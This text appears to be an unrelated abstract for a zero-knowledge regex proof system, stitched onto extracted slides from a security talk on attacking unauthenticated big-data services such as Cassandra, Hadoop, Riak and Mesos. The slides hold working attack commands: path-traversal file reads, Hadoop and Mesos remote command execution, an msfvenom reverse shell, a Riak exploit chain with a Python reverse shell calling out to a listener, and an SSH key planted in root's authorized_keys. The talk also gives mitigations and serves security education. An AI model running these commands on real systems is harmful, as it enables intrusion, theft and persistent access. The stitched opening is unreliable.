This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
2. Whom’i
● #offensive #defensive #bugs #shells #fun
● Been around the ‘block
○ MSFT, AMZN, NVDA, CRM, etc
● But at this very moment...
3.
4. Agenda
I. Intro
II. Attacking and bug hunting
A. Cassandra and friends
B. Hadoop and hadoopers
C. Riak and “just Erlang stuff”
D. Apache Drill and Mesos
E. Some honorable mentions
III. Conclusion
7. Testing
● Looking at a few different services that one may find in big data environments
● Focused on attacking default and common configurations
○ But various distros and packages may do many things differently
● Services may be run under privileged or non-privileged users
○ Tried to use the default/common ones here, but no guarantees
○ YMMY for which particular user account you end up shelling out on
● Some packages may run all or only a subset of services by default
○ Binding to localhost, network interface and associated network layout and firewall rules
depend on specific environmental factors
8. Bugs vs Attacks
● There are bugs
○ These let you compromise the target generically, very repeatable
○ “There’s an RCE in Spark, I can ./pwn any version now”
● And there are attacks
○ Often specific to the environment, access control, configuration, etc
○ Repeatable, but often tailored and used within a broader goal
○ “I found a Redis open for business on the network and it contains the secrets I’m looking for”
9. Bugs vs Attacks
● Related, but different
● Either can be chained together with one or more to compliment each other
○ “I used an SSRF in the web app to hit metadata, used creds to access S3, found more creds
and eventually escalated to admin horizontally in the network”
10. Common Bugs
● RCE due to some parser error
● Privilege escalation due to some missing checks
● Bypass in some security filters or validation
● Server performing some dangerous acts on behalf of the client
● Arbitrary file read, write, LFI, race condition, overflows, deserialization, etc
11. Common Attacks
● No authentication or authorization
● Default/weak credentials
○ admin:admin, cassandra:cassandra, root:hadoop, etc
● RCE by design
○ Gotta put auth in front of it
● SSRF by design
○ Or generally sweet talking internal services
● Bad assumptions on who can talk to the service
● Once creds or keys are stolen, own many or every things
13. Cassandra
● No authN by default
○ “By default, Cassandra is configured with AllowAllAuthenticator which performs no authentication checks and therefore
requires no credentials. It is used to disable authentication completely.”
Reference
https://cassandra.apache.org/doc/latest/operating/security.html
15. Cassandra
● Which means a normal user cannot add more superusers
○ Except... it can change the password of a superuser account ?!
● test@cqlsh>
○ create role test1 with password = 'password' and superuser = true and
login = true;
■ Unauthorized: Error from server: code=2100 [Unauthorized] message="Only superusers
can create a role with superuser status"
○ alter role cassandra with password = 'test';
● $ cqlsh -u cassandra -p test
○ cassandra@cqlsh>
16. Cassandra
● Flip authorizer to CassandraAuthorizer in cassandra.yaml
● test@cqlsh>
○ alter role cassandra with password = 'test';
■ Unauthorized: Error from server: code=2100 [Unauthorized] message="User test does
not have sufficient privileges to perform the requested operation"
18. Cassandra
● Reading arbitrary client-side files using tables
○ cassandra@cqlsh>
■ create keyspace etc with replication = {'class':'SimpleStrategy',
'replication_factor':1};
■ create table etc.passwd (a text PRIMARY KEY, b text, c text, d
text, e text, f text, g text);
■ copy etc.passwd from '/etc/passwd' with delimiter = ':';
19. Cassandra
● Mitigate keyspace creation by turning on AuthZ
○ Users can’t create keyspaces, tables, etc
○ test@cqlsh>
■ create keyspace etc ...
● Unauthorized: Error from server: code=2100 [Unauthorized] message="User test
has no CREATE permission on <all keyspaces> or any of its parents"
■ copy ...
● Failed to import 20 rows…
● Failed to import 17 rows: Unauthorized - Error from server: code=2100
[Unauthorized] message="User test has no MODIFY permission on <table
etc.passwd> or any of its parents", given up after 5 attempts
● Failed to process 37 rows; failed rows written to import_etc_passwd.err
20. Cassandra Web
● Adds a web UI for Cassandra (instead of just cqlsh)
○ No authN by default nor is it built-in
■ Folks suggest you can just add HTTP basic auth yourself
■ So even if you turned authN on for Cassandra, now you’re exposing it post-auth
● Remember those client-side features?
Reference
https://www.rubydoc.info/gems/cassandra-web/
21. Cassandra Web
● File read commands should turn client-side -> server-side disclosure
○ SOURCE ‘/etc/passwd’ and copy ks.table from '/etc/passwd' both throw errors
○ “no viable alternative at input source” (?)
● But there’s plenty of stuff to do
23. Cassandra Web
● Remember when we tried to dump /etc/passwd into a table?
○ But failed because the test user didn’t have authorization to MODIFY
$ curl cweb.host:3000/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fimport_etc_passwd.err
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
...
24. Cassandra Web
● Don’t disable Rack::Protection
○ Fixed on github the SAME DAY it was reported
References
https://github.com/avalanche123/cassandra-web/commit/f11e47a26f316827f631d7bcfec14b9dd94f44be
https://www.rubydoc.info/gems/rack-protection/1.4.0
25. Cassandra Web
● If you run this, try to limit the blast radius
○ Containerize it
○ Or at least sandbox it somehow, eg. AppArmor
■ aa-genprof
■ run the app
■ ...modify the profile (which was generated based on execution data) as needed
■ apparmor_parser -r /etc/apparmor.d/usr.local.bin.cassandra-web
27. Hadoop
● No authentication = be who you want to be
○ Browse/modify the data lake
○ $ export HADOOP_USER_NAME=hadoop
○ $ hadoop fs -touch /abc
○ $ hadoop fs -ls /
■ -rw-r--r-- 3 hadoop supergroup 0 2020 17:00 /abc
29. Hadoop
● No authentication = be who you want to be
○ $ export HADOOP_USER_NAME=hadoop
○ $ hadoop jar hadoop-streaming.jar -input /test/test -output /test/out
-mapper “id” -reducer NONE
○ $ hadoop fs -cat /test/out/part-00000
■ uid=1001(hadoop) gid=1001(hadoop) groups=1001(hadoop)
30. Hadoop
● Authentication? Be who you want to be *
○ * (or whichever user which hadoop is running)
○ Local command execution
■ $ export HADOOP_USER_NAME=root
■ $ hadoop fs -mkdir /tmp/input
■ $ hadoop fs -touchz /tmp/input/123
■ $ hadoop jar hadoop-streaming.jar -input /test/123 -output
/tmp/out -mapper "id" -reducer NONE
● INFO mapreduce.Job: Job job_1603984220990_0006 completed
successfully
■ $ hadoop fs -cat /tmp/out/part-00000
● uid=0(root) gid=0(root) groups=0(root)
31. Hadoop
● Same with WebHDFS
References
https://hadoop.apache.org/docs/r1.2.1/webhdfs.html
32. Hadoop
● Authentication? Be who you want to be *
○ Remote command execution
○ Check if ports 8032 (yarn), 9000 (namenode), 50010 (hdfs) are open
■ $ nmap -p 8032,9000,50010 172.17.0.3
● PORT STATE SERVICE
● 8032/tcp open pro-ed
● 9000/tcp open cslistener
● 50010/tcp open unknown
33. Hadoop
● Authentication? Be who you want to be *
○ Remote command execution
■ $ hadoop jar hadoop-streaming.jar -fs 172.17.0.3:9000 -jt
172.17.0.3:8032 -input /test/123 -output /tmp/out -mapper "id" -
reducer NONE
● INFO mapreduce.Job: Running job: job_1604081764253_0010
● INFO ipc.Client: Retrying connect to server: 0.0.0.0/0.0.0.0:10020. Already tried 9
time(s); retry policy is RetryUpToMaximumCountWithFixedSleep(maxRetries=10,
sleepTime=1000 MILLISECONDS)
● Streaming Command Failed!
34. Hadoop
● Authentication? Be who you want to be *
○ Remote command execution
○ Did it fail?
■ $ hdfs dfs -cat hdfs://172.17.0.3:9000/tmp/out/part-00000
● uid=0(root) gid=0(root) groups=0(root)
35. Hadoop
● Ok but shell, right?
○ $ msfvenom -p linux/x64/shell/reverse_tcp LHOST=172.17.0.2 LPORT=5555
-f elf -o shell.out
○ $ hadoop jar hadoop-streaming.jar -fs 172.17.0.3:9000 -jt
172.17.0.3:8032 -input /test/123 -output /tmp/out -file shell.out -
mapper "./shell.out" -reducer NONE -background
● For some reason this wasn’t working
○ Would get a connect back, but no shell :’(
40. Apache Knox and Ranger
Image Credit
https://medium.com/@takkarharsh/authorization-of-services-using-knox-ranger-and-ldap-on-hadoop-cluster-35843a9e6cdb
41. Hadoop
● So make sure to keep it inside the local network
○ NOT internet facing for any rea…..
References
https://www.shodan.io/search?query=Hadoop+IPC+port
42. Riak
● Riak KV
○ NoSQL key-value database
● Default install
○ riak start
■ Listens on 0.0.0.0:[high port] with “cookie” auth
○ HTTP service on localhost:8098
■ Read and even PUT data, call /mapred, etc
○ Other services which may be interesting
References
https://riak.com/products/riak-kv/index.html
43. Riak
● Locally browse the filesystem as the riak running user
○ $ riak admin describe test
■ Invalid config keys: test
○ $ riak admin describe *
■ Invalid config keys: Desktop Documents Downloads Music Pictures Public Templates
Videos
○ $ riak admin describe /var/*
■ Invalid config keys: /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log
/var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/www
45. Riak
● Remote command execution?
○ (configure node name and update /etc/hosts on attacking terminal for hostname resolution)
○ $ erl -name test@ubuntu.test -setcookie riak -remsh riak@ubuntu.test
■ (riak@ubuntu.test)1> os:cmd("id;pwd").
■ *** ERROR: Shell process terminated! (^G to start new job) ***
46. Riak
● WHAT IF instead of trying to use erl directly
○ We just set up another riak node with the same default cookie
● BINGO’ish
○ $ riak eval "rpc:call('riak@ubuntu.test', os, cmd, [id])."
■ "uid=1000(user) gid=1000(user) groups=1000(user)n"
○ $ riak eval "rpc:call('riak@ubuntu.test', os, cmd, [“id;pwd”])."
■ escript: exception error: no match of right hand side value
● Doesn’t like spaces, special characters, other syntax, etc
47. Riak
● Tried a few other things
○ Other process spawning things
■ $ riak eval "erlang:spawn('riak@ubuntu.test', os, cmd, ["id"])."
● <9718.14141.56>
● (running exec-notify on the other box)
○ pid=3874367 executed [id ]
○ Read files and list dirs, but only in the current directory
■ riak eval "rpc:call('riak@ubuntu.test', file, read_file,
["test"])."
■ riak eval "rpc:call('riak@ubuntu.test', file, list_dir,
["log"])."
● {ok,["console.log","crash.log.0",...]}
48. Riak
● More digging through http://erlang.org/doc/man/
○ (over)write files in current directory
■ riak eval "rpc:call('riak@ubuntu.test', file, write_file,
["test123", []])."
○ Change the current working directory (up only)
■ riak eval "rpc:call('riak@ubuntu.test', file, set_cwd, ["etc"])."
■ riak eval "rpc:call('riak@ubuntu.test', os, cmd, ["ls"])."
● "advanced.configndatanlognriak.confn"
○ file:delete_d_r, file:make_symlink, heart:set_cmd, os:putenv, etc
■ Most either have character restrictions or failed otherwise
49. Riak
● Get a reverse shell with a single command?
○ Only run one command with no args
○ No specifying paths, executable must be in local PATH
50. Riak
● Exploit chain for RCE
○ 1. Find a useful PATH that we can pivot up into
■ rpc:call('riak@ubuntu.test', os, cmd, ["env"]).
● "...nPATH=/opt/riak/rel/riak/erts-
10.6.4/bin:/opt/riak/rel/riak/bin:/opt/riak/.local/bin:/usr/l
ocal/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/g
ames:/usr/local/games
○ Check our current path
■ rpc:call('riak@ubuntu.test', os, cmd, ["pwd"]).
● "/opt/riak/rel/riakn"
51. Riak
● Exploit chain for RCE
○ 2. Change into the bin folder which is in our PATH
■ rpc:call('riak@ubuntu.test', file, set_cwd, ["bin"]).
○ 3. Find an executable in bin that “we won’t miss”
■ rpc:call('riak@ubuntu.test', os, cmd, ["ls"]).
■ "cf_configncuttlefishndatanhooksninstall_upgrade.escriptnlog
nnodetool...
52. Riak
● Exploit chain for RCE
○ 4. Craft our payload and overwrite the executable file
■ (perhaps call copy on the executable beforehand and save the original)
■ Passing “id” to file:write_file results in {error,badarg}
■ rpc:call('riak@ubuntu.test', file, write_file, ["cf_config",
[105,100]]).
○ Verify the file (for good measure)
■ rpc:call('riak@ubuntu.test', file, read_file, ["cf_config"]).
● {ok,<<"id">>}
53. Riak
● Exploit chain for RCE
○ Writing file data in Erlang bytecode is.. “fun”
■ Wrote estr2bc.py to map strings to bytecode
■ So let’s skip executing commands and go straight to shell
References
https://elixirforum.com/t/how-to-get-the-binary-representation-of-a-module/18006/3
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
54. Riak
● Exploit chain for RCE
○ Modify a payloads-all-the-things reverse shell
■ estr2bc.py "python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S
TREAM);s.connect(("10.0.0.100",5555));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;
pty.spawn("/bin/bash")'"
● [112,121,116,104,111,110,32,45,99,32,39,105,109,112,111,114,1
16,32,115,111,99,107,101,116,44,115,117,98,112,114,111,99,101
,115,115,44,111,115,59,115,61,115,111,99,107,101,116,...]
References
estr2bc.py should be available on Packetstorm
55. Riak
● Exploit chain for RCE
○ 5. Start our listener for the shell and execute the payload
■ rpc:call('riak@ubuntu.test', os, cmd, ["cf_config"]).
■ [test@localhost ~]$ nc -l -p 5555
■ ...
● user@ubuntu:~/opt/riak/rel/riak/bin$ id
● uid=1000(user) gid=1000(user) groups=1000(user)
56. Riak
● Recap for shell from a single command + navigating paths + calling functions
○ Execute env for PATH
○ Call set_cwd to bin in PATH
○ Select executable file in bin to overwrite
○ Generate bytecode payload and replace executable
○ Run the new executable
57. Riak
● Change those default cookies
○ You only want all of your nodes to communicate
References
../etc/riak.conf
60. Apache Drill
● Schema-free SQL query engine
● Web interface on port 8049
○ Embedded mode or Distributed mode
○ Anonymous access by default
○ Can run queries and create plugins (!)
Image Credit
https://www.slideshare.net/Hadoop_Summit/understanding-the-value-and-architecture-of-apache-drill
66. Apache Drill
● Tons of security docs for distributed mode
○ Not so much for Embedded mode, which is much easier to setup and run
○ Wonder which mode lots of users are going to choose…
● Enable PAM for authentication in conf/drill-override.conf
○ Then pass the -n <local user> -p <password> CLI params :’)
Reference
https://drill.apache.org/docs/using-libpam4j-as-the-pam-authenticator/
67. Apache Mesos
● Cluster compute manager and orchestration
○ Sort of like Kubernetes, but different
● Needs like 8gb ram minimum to compile
○ And it’s not even Java code :’)
● Listens on port 5050
○ Localhost or network interface
● Authentication as usual is disabled by default
68. Apache Mesos
● So… you ask mesos master to do stuff, and it asks the agents to just do it?
Reference
http://mesos.apache.org/documentation/latest/architecture/
70. Apache Mesos
● So literally throw that example in a JSON file
○ Change command value to whatever you like
○ Run it
■ $ LIBPROCESS_IP=10.0.0.2 mesos-execute --master=10.0.0.2:5050 --
task_group=file://task.json
○ Profit
● Or there’s a better way
○ $ mesos-execute --master=10.0.0.2:5050 --name=“test” --
command=”<insert payload here>”
71. Apache Mesos
● Agent will try to run commands as the actual user running mesos-execute
○ If you’re root on your box, and the agent is running as root, commands will run as such
■ So if you want remote root on the agent, you better have root on the attacking box :’)
○ If you’re logged in as notvalid (a user that doesn’t exist on the agent), then pound sand
■ Received status update TASK_DROPPED for task 'test'
■ message: 'Failed to create executor directory
'/opt/mesos/slaves/d951a83c-37be-4212-b9b8-9241c618b272-
S2840/frameworks/87333254-8ae1-4ad4-8ed5-caf83511b46c-
0009/executors/test/runs/dc91b882-99f0-43af-b74a-20ed15d7182c':
Failed to chown directory to 'notvalid': No such user 'notvalid''
■ source: SOURCE_AGENT
■ reason: REASON_EXECUTOR_TERMINATED
72. Apache Mesos
● Demo
○ # mesos-execute --master=10.0.0.2:5050 --name="test" --command="echo
<b64 encoded public key> | base64 -d >> /root/.ssh/authorized_keys"
■ Subscribed with ID 87333254-8ae1-4ad4-8ed5-caf83511b46c-0046
■ Submitted task 'test' to agent 'd951a83c-37be-4212-b9b8-9241c618b272-S2840'
■ Received status update TASK_STARTING for task 'test'
■ source: SOURCE_EXECUTOR
■ Received status update TASK_RUNNING for task 'test'
■ source: SOURCE_EXECUTOR
■ Received status update TASK_FINISHED for task 'test'
■ message: 'Command exited with status 0'
76. Apache Kudu
● kudu-master RPC listening on port 7051
○ Written in C++, so fuzz++
● Let’s go
○ $ bin/kudu-master --fs_wal_dir=/tmp/master --logtostderr …
○ $ tcpdump -i lo -X port 7051 -w kudu.pcap
○ $ bin/kudu master <pick a cmd so we can capture a session>
● Pass the session pcap to mutiny fuzzer
○ $ ./mutiny_prep.py kudu.pcap
○ $ ./mutiny.py kudu.fuzzer localhost
References/Image Credit
https://kudu.apache.org/
https://github.com/Cisco-Talos/mutiny-fuzzer
https://netbsd.org/~kamil/fuzzer_art/krolik.png
77. Apache Kudu
● Success?
○ Nothing reproducible :’(
1019 00:02:13.193902 (+ 4334us) negotiation.cc:304] Negotiation complete: Invalid argument: Server connection negotiation failed: server
connection from 127.0.0.1:37686: connection must begin with magic number: hrpc
Metrics: {"server-negotiator.queue_time_us":32}
@ 0x561412351c3b kudu::tablet::Tablet::GetBytesInAncientDeletedRowsets()
@ 0x56141236f074 kudu::tablet::DeletedRowsetGCOp::UpdateStats()
...
Aborted (core dumped)
78. Apache Kudu
● Always good to have process/fs monitoring running while fuzzing
● execsnoop or exec-notify, opensnoop, strace
○ Only prereq is that you have root on the box you’re testing
○ Exercise the app’s functions via fuzzing or manual execution
○ See if there are any tainted inputs that you’re triggering, check for various injections
● strace example
○ sudo strace -f -s 4096 -e trace=process,open,read,write,access -p <pid> 2>&1 | grep -v “stuff
to ignore”
References
https://raw.githubusercontent.com/Symbiograph/linux-sensation/master/exec-notify.c
https://github.com/brendangregg/perf-tools
79. Apache Sqoop
● Lots of exceptions and eventual DoS while fuzzing the metadata service
○ Replaying several thousand “list” requests
References
https://sqoop.apache.org
80. RabbitMQ
● Default cookie security is actually OK
○ $ rabbitmqctl -n rabbit@ubuntu.test status
○ ...
■ rabbit@ubuntu.test:
■ * connected to epmd (port 4369) on ubuntu.test
■ * epmd reports node 'rabbit' running on port 25672
■ * TCP connection succeeded but Erlang distribution failed
■ * suggestion: hostname mismatch?
■ * suggestion: is the cookie set correctly?
References
https://www.rabbitmq.com/clustering.html#erlang-cookie
81. Summary
● Unauth’d services that can provide…
○ RCE or local shell
■ Hadoop
■ Riak
■ Mesos
○ Arbitrary file reads/writes, privilege escalation
■ Cassandra
■ Cassandra Web
■ Drill
83. Conclusion
● Solid authentication by default isn’t the norm in big data
○ Often tedious to setup or just not well integrated with the product
● Hopefully newer projects will do better
○ Make security always on, hard to disable and meaningful to the user
○ If it gets in the way, people will just turn it off.. and how can you blame them?
Great resource to learn and explore more
https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures
84. Conclusion
● For attackers
○ LOTS of options
○ Gaining access can mean one host or thousands
● For defenders
○ LOTS of work to do
○ Need to ensure configs are solid, network access is restricted, etc
Great resource to learn and explore more
https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures
85. Conclusion
We fixed all the critical static analysis bugs
○ ...the design review was thorough
○ ...all the ACLs and configs are good
○ ...updated all the software packages
○ ...and we fuzzed all the things
But... did you actually test it?